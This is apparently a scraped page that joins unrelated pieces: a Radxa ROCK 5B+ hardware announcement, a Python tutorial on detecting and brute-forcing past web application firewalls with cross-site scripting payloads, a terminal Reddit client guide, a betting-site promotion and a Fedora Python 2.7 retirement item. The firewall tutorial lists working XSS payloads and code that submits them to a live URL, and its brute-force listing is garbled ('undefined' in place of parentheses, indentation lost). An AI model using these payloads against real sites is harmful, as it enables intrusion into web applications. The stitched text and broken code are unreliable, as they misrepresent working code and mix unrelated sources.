Jul 22, 2024 — by Giorgio Mendoza

301 views

Twitter
Facebook
LinkedIn
Reddit
Pinterest
Email

Radxa has introduced an upgraded version of their Radxa ROCK 5B, originally launched in 2022. This latest iteration of the single-board computer retains the Rockchip RK3588 SoC from its predecessors, now enhanced with significant upgrades including LPDDR5 RAM, dual M.2 M Key connectors, onboard Wi-Fi 6, among other features.

The ROCK 5B+, following its predecessors—the ROCK 5B and the ROCK 5B Blue Edition—continues to feature the Rockchip RK3588 SoC, comprising a quad-core Cortex-A76 CPU up to 2.4GHz and a quad-core Cortex-A55 at 1.8GHz.
The device includes an Arm Mali G610MC4 GPU, which supports a wide array of graphics and computational APIs including OpenGL ES 3.2, OpenCL 2.2, and Vulkan 1.2. It also features a NPU that supports multiple data types and is capable of performing up to 6TOPs, useful for artificial intelligence tasks.

Use Python To Detect And Bypass Web Application Firewall

0
Use Python To Detect And Bypass Web Application Firewall

Web application firewalls are usually placed in front of the web
server to filter the malicious traffic coming towards server. If you are
hired as a penetration tester for some company and they forgot to tell
you that they are using web application firewall than you might get into
a serious mess. The figure below depicts the working of a simple web
application firewall:

As
you can see its like a wall between web traffic and web server, usually
now a days web application firewalls are signature based.
What is a signature based firewall?

In
a signature based firewall you define signatures, as you know web
attacks follow similar patters or signatures as well. So we can define
the matching patterns and block them, i.e.Payload :- <svg><script>alert&grave;1&grave;<p>The
payload defined above is a kind of cross site scripting attack, and we
know that all these attacks can contain following substring -> “<script>”,
so why don’t we define a signature that can block a web traffic if it
contains this sub string, we can define 2-3 signatures as defined below:
<script>
alert(*)

First
signature will block any request that contains
substring, and second one will block alert(any text). So, this is how
signature based firewall works.

How to know there is a firewall?

If
you are performing a penetration test and you didn’t know that there
was a firewall blocking the traffic than it can waste a lot of your
time, because most of the time your attack payloads are getting blocked
by the firewall not by your application code, and you might end up
thinking that the application you are testing have a secure good and is
good to go. So, it is a good idea to first test for web application
firewall presence before you start your penetration test.Most of
the firewalls today leave some tracks about them, now If you attack a
web application using the payload we defined above and get the following
response:HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the

requested resource could not be found on this server. This error was generated by Mod_Security.

You
can clearly see that your attack was blocked by the Mod_Security
firewall. In this article we will see how we can develop a simple python
script that can do this task detecting firewall and bypassing it.

Step 1: Define HTML Document and PHP Script!
We
will have to define our HTML document for injection of payload and
corresponding PHP script to handle the data. We have defined both of
them below.
We will be using the following HTML Document:

<html>
<body>
<form name=”waf” action=”waf.php” method=”post”>
Data: <input type=”text” name=”data”><br>
<input type=”submit” value=”Submit”>
</form>
</body>
</html>

PHP Script:

<html>
<body>
Data from the form : <?php echo $_POST[“data”]; ?><br>
</body>
</html>

Step 2: Prepare malicious request!
Our
second step towards detecting the firewall presence is creating a
malicious cross site scripting request that can be blocked by the
firewall. We will be using a python module called ‘Mechanize’, to know
more about this module please read the following article :

If
you already know about Mechanize, you can skip reading the article. Now
that you know about Mechanize, we can select the web form present on
any page and submit the request. Following code snippet can be used to
do that:

import mechanize as mec
maliciousRequest = mec.Browser()
formName=”waf”
maliciousRequest.open(“http://check.cyberpersons.com/crossSiteCheck.html”)
maliciousRequest.select_form(formName)

Lets discuss this code line wise:

On the first line we’ve imported the mechanize module and given it a short name ‘mec’ for later reference.
To
download a web page using mechanize, instantiation of browser is
required. We’ve just did that in the second line of the code.
On
the first step we’ve defined our HTML document, in which the form name
was ‘waf’, we need to tell mechanize to select this form for submission,
so we’ve this name in a variable called formName.
Than we
opened this url, just like we do in a browser. After the page gets
opened we fill in the form and submit data, so opening of page is same
here.
Finally we’ve selected the form using ‘select_form’ function passing it ‘formName’ variable.

As
you can see in the HTML source code, that this form have only one input
field, and we are going to inject our payload in that field and once we
receive response we’re going to inspect it for know strings to detect
the presence of the web application firewall.

Step 3: Prepare the payload
In our HTML document we’ve specified one input field using this code:
input type=”text” name=”data”>
You can see that name of this field is ‘data’, we can use following bit of code to define input for this field :crossSiteScriptingPayLoad = “<svg><script>alert&grave;1&grave;<p>”

maliciousRequest.form[‘data’] = crossSiteScriptingPayLoad

First line saves our payload in a variable.
In a second line of code, we’ve assigned our payload to a form field ‘data’.

We can now safely submit this form and inspect the response.

Step 4: Submit the form and record Response
Code I am going to mention after this line will submit the form and record the response:maliciousRequest.submit()
response = maliciousRequest.response().read()

print response

Submit the form.
Save the response in a variable.
Print the response back.

As I currently have no firewall installed, the response I got is :As
you can see that payload is printed back to us, means no filtering is
present on the application code and due to the absence of firewall our
request was also not blocked.
Step 5: Detect the Presence of firewall
Variable
named ‘response’ contains the response we got from server, we can use
the response to detect presence of firewall. We will try to detect the
presence of following firewalls in this tutorial.

WebKnight.
Mod_Security.
Dot Defender.

Let see how we can achieve this with python code:if response.find(‘WebKnight’) >= 0:
       print “Firewall detected: WebKnight”
elif response.find(‘Mod_Security’) >= 0:
      print “Firewall detected: Mod Security”
elif response.find(‘Mod_Security’) >= 0:
      print “Firewall detected: Mod Security”
elif response.find(‘dotDefender’) >= 0:
      print “Firewall detected: Dot Defender”
else:
      print “No Firewall Present”

If Web Knight firewall is
installed and our request got blocked, response string will contain
‘WebKnight’ inside it some where, so find function will return value
greater than 0, that means WebKnight firewall is present. Similarly we
can check for other 2 firewalls as well.
We can extend this small application to detect for as many number of firewalls, but you must know there response behavior.

Using Brute force to bypass Firewall filter
I’ve
mentioned in the start of the article that mostly firewall these days
block requests based on signatures. But there are hundreds and thousands
of ways you can construct a payload. Java script is becoming complex
day by day, we can make a list of payloads, and try each of them, record
each response and check if we was able to bypass the firewall or not.
Please note that if firewall rules are well defined than this approach
might not work. Let see how we can brute force using python:listofPayloads = [‘&lt;dialog open=”” onclose=”alertundefined1)”&gt;&lt;form method=”dialog”&gt;&lt;button&gt;Close me!&lt;/button&gt;&lt;/form&gt;&lt;/dialog&gt;’, ‘&lt;svg&gt;&lt;script&gt;prompt&amp;#40 1&amp;#41&lt;i&gt;’, ‘&lt;a href=”&amp;#1;javascript:alertundefined1)”&gt;CLICK ME&lt;a&gt;’]
for payLoads in listofPayloads:
maliciousRequest = mec.Browserundefined)
formName=”waf”
maliciousRequest.openundefined”http://check.cyberpersons.com/crossSiteCheck.html”)
maliciousRequest.select_formundefinedformName)
maliciousRequest.form[‘data’] = payLoads
maliciousRequest.submitundefined)
response = maliciousRequest.responseundefined).readundefined)
if response.findundefined’WebKnight’) &gt;= 0:
print “Firewall detected: WebKnight”
elif response.findundefined’Mod_Security’) &gt;= 0:
print “Firewall detected: Mod Security”
elif response.findundefined’Mod_Security’) &gt;= 0:
print “Firewall detected: Mod Security”
elif response.findundefined’dotDefender’) &gt;= 0:
print “Firewall detected: Dot Defender”
else:
print “No Firewall Present”

On the first line we’ve defined a list of 3 payloads, you can extend this list and add as many payloads as you require.
Then inside the for loop we did the same process we did above, but this time for each payload in a list.
Upon receiving response we again compare and see see if firewall is present on not.

As I’ve had no firewall installed, my output was:

Convert HTML Tags to Unicode or Hex Entities
If
for example firewall is filtering html tags like <, >. We can
send their corresponding Unicode or Hex Entities and see if they are
being converted to there original form, if so, than this could be an
entry point as well. Code below can be used to examine this process:listofPayloads = [‘&lt;b&gt;’,’\u003cb\u003e’,’\x3cb\x3e’]
for payLoads in listofPayloads:
     maliciousRequest = mec.Browser()
     formName=”waf”
     maliciousRequest.open(“http://check.cyberpersons.com/crossSiteCheck.html”)
     maliciousRequest.select_form(formName)
     maliciousRequest.form[‘data’] = payLoads
     maliciousRequest.submit()
     response = maliciousRequest.response().read()
     print “—————————————————”
     print response
     print “—————————————————”

Each
time we will send the encoded entry and in the response we will examine
if it got converted or printed back without conversion, when I ran this
code I got the this output :

Means none of the encoded entry got converted to its original form.

Conclusion
The
purpose of this article was to train you in advance so that you can
penetrate your firewall before a hacker can do. It is always a good
choice to self test your network infrastructure for vulnerabilities,
because our first concern always is to get our application up and
running and we overlook the security part. But it must not be over
looked, because later it can be a huge headache.
Complete source code can be downloaded from this link.Author Info:
Usman Nasir, founder, and author of Cyberpersons
is a Computer Science student. I also worked as a technical support
staff at various hosting companies and love to write about Linux and web
application security.

Using Reddit from the console in 2020 — The Ultimate Linux Newbie Guide

0
tuir

I’m going to horrify thousands of people out here when I say: I think reddit sucks. Specifically, I hate how horrid it looks. And yes, that’s after the new ‘facelifted’ reddit! The other day, I wanted to print out a page of comments from a subreddit. Before you tell me that it’s 2020 and I shouldn’t be printing stuff out anyway, I agree. But for this one exercise, it was really handy to have a printout. No matter what reader view plugin I used, or PDF conversion tool I opted for, the outcome was the same: either the reader couldn’t parse the page at all, or upon switching to classic view, I got a little more and I could at least print a page with Ctrl+P. Either way, it came out all over the place.
Most of the times with reddit, I pretty much just want the text. In fact, like many of you, I work at the command line for many hours of the day, so having a reddit client that would work on the command-line, and could also format the text in a completely readable way sounds pretty slick. Some of you may be aware of the CLI/curses based tool called RTV. Unfortunately the author decided to abandon the client some time back in 2019, so for a while, we’ve been without an up to date Linux command-line client. Have no fear, however. Based upon the look-and-feel of the RTV client comes TUIR (Terminal UI for Reddit) and TTRV (Tilde Terminal Reddit Viewer). At the moment, both apps are pretty much identical, so take your pick.
RTV is still available in the Ubuntu repositories, however I’m not sure how long that will last, but at least for now, you can simply sudo apt install rtv.Fortunately installation of TTRV or TUIR is trivial also. Simply do the following:
1) clone the git repos (eg: git clone https://gitlab.com/ajak/tuir.git )
2) cd into their respectively cloned directory (eg, cd tuir)
3) run python3 setup.py install
4) run the binary, e.g. ‘tuir’ at the command prompt.

It looks pretty good. I’m happy with it, and making this grumpy old man happy is a big thing these days!
Finally, there is also an older app called Cortex, which I’m unsure if it’s being maintained any more, but it still has promise, if you want to try something else. Check out the Git Repo here.
Enjoy!
Like this:Like Loading…

A Journey from Inception to Prominence

0
A Journey from Inception to Prominence

Since its inception, https://4rabet-sport.com/ has undergone a remarkable evolution, transforming from a fledgling betting platform into a prominent player in the online gambling industry. This journey, marked by key milestones, innovative strategies, and a steadfast commitment to excellence, has propelled 4rabet to the forefront of the betting world.Founding and Early Growth Founded on the principles of innovation and customer satisfaction, 4rabet began its journey with a vision to revolutionize the online betting experience. In its early days, the platform focused on building a robust infrastructure, forging strategic partnerships, and establishing a strong foothold in the competitive betting market. Through relentless dedication and a customer-centric approach, 4rabet quickly gained traction among bettors seeking a reliable and immersive betting platform.Innovations and Advancements Central to 4rabet’s success has been its commitment to innovation and continuous improvement. The platform has consistently pushed the boundaries of what is possible in online betting, introducing cutting-edge features and functionalities to enhance the user experience. From intuitive interfaces and mobile optimization to live betting options and personalized recommendations, 4rabet has remained at the forefront of technological innovation, setting new standards for excellence in the industry.Expansion and Global Reach As 4rabet continued to grow and expand its offerings, it also embarked on a journey of global expansion, reaching new markets and audiences around the world. Through strategic partnerships and targeted marketing initiatives, 4rabet has successfully penetrated diverse geographical regions, cementing its position as a global leader in the betting industry. Today, 4rabet boasts a widespread presence, catering to the diverse needs and preferences of bettors across continents.Commitment to ExcellenceUnwavering commitment to excellence in all aspects of operations.Prioritization of customer service and user experience.Emphasis on security and responsible gambling practices.Fostering a culture of transparency, integrity, and accountability.Trust and loyalty earned from millions of bettors worldwide.Solidification of reputation as a trusted and reputable betting platform.Looking AheadImage by user15245033 on FreepikAs 4rabet continues to evolve and adapt to the ever-changing landscape of the betting industry, the future holds exciting possibilities and opportunities for growth. With a relentless focus on innovation, customer satisfaction, and responsible gambling, 4rabet is poised to build upon its past successes and further solidify its position as a leader in the online betting market. As the journey of 4rabet unfolds, bettors can expect a continued commitment to excellence and a dedication to providing an unparalleled betting experience for years to come.FAQsWhat distinguishes 4rabet from other betting platforms?4rabet stands out from its competitors with its user-friendly interface, diverse range of sports markets, and innovative features such as live betting options and personalized recommendations. Additionally, 4rabet prioritizes responsible gambling initiatives, ensuring a safe and enjoyable betting experience for all users.How does 4rabet ensure the security of user data and transactions?4rabet employs state-of-the-art encryption technology and robust security protocols to safeguard user data and transactions. The platform undergoes regular audits and adheres to stringent regulatory standards to maintain the highest levels of security and compliance.What support options are available for users on 4rabet?4rabet offers comprehensive customer support options, including live chat, email support, and a detailed FAQ section, to assist users with any queries or issues they may encounter. Additionally, the platform provides resources and links to support organizations for users who may need assistance with responsible gambling practices.

Fedora 41 Finally Retires Python 2.7

0
Python

“After sixteen years since the introduction of Python 3, the Fedora project announces that Python 2.7, the last of the Python 2 series, will be retired,” according to long-time Slashdot reader slack_justyb.From the announcement on the Fedora changes page: The python2.7 package will be retired without replacement from Fedora Linux 41. There will be no Python 2 in Fedora 41+ other than PyPy. Packages requiring python2.7 on runtime or buildtime will have to deal with the retirement or be retired as well. “This also comes with the announcement that GIMP 3 will be coming to Fedora 41 to remove any last Python 2 dependencies,” adds slack_justyb. GIMP 2 was originally released on March 23, 2004.

GIMP will be updated to GIMP 3 with Python 3 support. Python 2 dependencies of GIMP will be retired. Python 2’s end of life was originally 2015, but was extended to 2020. The Python maintainers close with this:

The Python maintainers will no longer regularly backport security fixes to Python 2.7 in RHEL, due to the the end of maintenance of RHEL 7 and the retirement of the Python 2.7 application stream in RHEL 8. We provided this obsolete package for 5 years beyond its retirement date and will continue to provide it until Fedora 40 goes end of life. Enough has been enough.